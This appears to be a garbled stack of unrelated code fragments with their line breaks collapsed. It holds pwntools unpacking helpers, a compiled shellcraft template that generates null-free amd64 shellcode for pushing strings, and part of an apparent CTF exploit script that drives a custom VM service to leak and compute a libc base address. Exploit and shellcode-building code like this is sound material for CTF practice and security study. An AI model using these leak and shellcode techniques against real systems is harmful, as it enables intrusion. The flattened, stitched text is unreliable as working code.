def u64(self, *a, **kw): return packing.u64(self.recvn(8), *a, **kw)
def u64(self, address, *a, **kw): return packing.u64(self.read(address, 8), *a, **kw) def u32(self, address, *a, **kw): return packing.u32(self.read(address, 4), *a, **kw)
def render_body(context,string,append_null=True,**pageargs): __M_caller = context.caller_stack._push_frame() try: __M_locals = __M_dict_builtin(pageargs=pageargs,string=string,append_null=append_null) ord = context.get('ord', UNDEFINED) hex = context.get('hex', UNDEFINED) repr = context.get('repr', UNDEFINED) __M_writer = context.writer() from pwnlib.util import lists, packing, fiddling __M_locals_builtin_stored = __M_locals_builtin() __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['packing','fiddling','lists'] if __M_key in __M_locals_builtin_stored])) __M_writer(u'\n') __M_writer(u'\n') if append_null: string += '\x00' if not string: return def okay(s): return '\n' not in s and '\0' not in s if ord(string[-1]) >= 128: extend = '\xff' else: extend = '\x00' def pretty(n): return hex(n & (2 ** 64 - 1)) __M_locals_builtin_stored = __M_locals_builtin() __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['pretty','okay','string','extend'] if __M_key in __M_locals_builtin_stored])) __M_writer(u' /* push ') __M_writer(unicode(repr(string))) __M_writer(u' */\n') for word in lists.group(8, string, 'fill', extend)[::-1]: sign = packing.u64(word, 'little', 'signed') __M_locals_builtin_stored = __M_locals_builtin() __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['sign'] if __M_key in __M_locals_builtin_stored])) if sign in [0, 0xa]: __M_writer(u' push ') __M_writer(unicode(sign + 1)) __M_writer(u'\n dec byte ptr [rsp]\n') elif -0x80 <= sign <= 0x7f and okay(word[0]): __M_writer(u' push ') __M_writer(unicode(pretty(sign))) __M_writer(u'\n') elif -0x80000000 <= sign <= 0x7fffffff and okay(word[:4]): __M_writer(u' push ') __M_writer(unicode(pretty(sign))) __M_writer(u'\n') elif okay(word): __M_writer(u' mov rax, ') __M_writer(unicode(hex(sign))) __M_writer(u'\n push rax\n') elif word[4:] == '\x00\x00\x00\x00': a,b = fiddling.xor_pair(word[:4], avoid = '\x00\n') a = packing.u32(a, 'little', 'unsigned') b = packing.u32(b, 'little', 'unsigned') __M_locals_builtin_stored = __M_locals_builtin() __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['a','b'] if __M_key in __M_locals_builtin_stored])) __M_writer(u' push ') __M_writer(unicode(pretty(a))) __M_writer(u'\n xor dword ptr [rsp], ') __M_writer(unicode(pretty(b))) __M_writer(u'\n') else: a,b = fiddling.xor_pair(word, avoid = '\x00\n') a = packing.u64(a, 'little', 'unsigned') b = packing.u64(b, 'little', 'unsigned') __M_locals_builtin_stored = __M_locals_builtin() __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['a','b'] if __M_key in __M_locals_builtin_stored])) __M_writer(u' mov rax, ') __M_writer(unicode(pretty(a))) __M_writer(u'\n push rax\n mov rax, ') __M_writer(unicode(pretty(b))) __M_writer(u'\n xor [rsp], rax\n') return '' finally: context.caller_stack._pop_frame()
def u64(self, address, *a, **kw): """Unpacks an integer from the specified ``address``.""" return packing.u64(self.read(address, 8), *a, **kw)
s.send('\x04') s.readuntil('\n') # select VM1 s.readuntil('\n') s.send('\x01') s.readuntil('A\n') code = '' code += vm_asm(VM1_OPCODE_MOV, arg_reg(REG_ES), arg_imm(0x800)) code += vm_asm(VM1_OPCODE_MOV, arg_reg(REG_AX), arg_imm(0x8)) code += vm_asm(VM1_OPCODE_OUT) code += vm_asm(VM1_OPCODE_HLT) send(code) libc_base = u64(s.recv(8)) - 0x6f690 ######################### # leak done ######################### # clear VM1 s.readuntil('\n') s.send('\x04') # clear VM2 s.readuntil('\n') s.send('\x05') # clear VM3 s.readuntil('\n')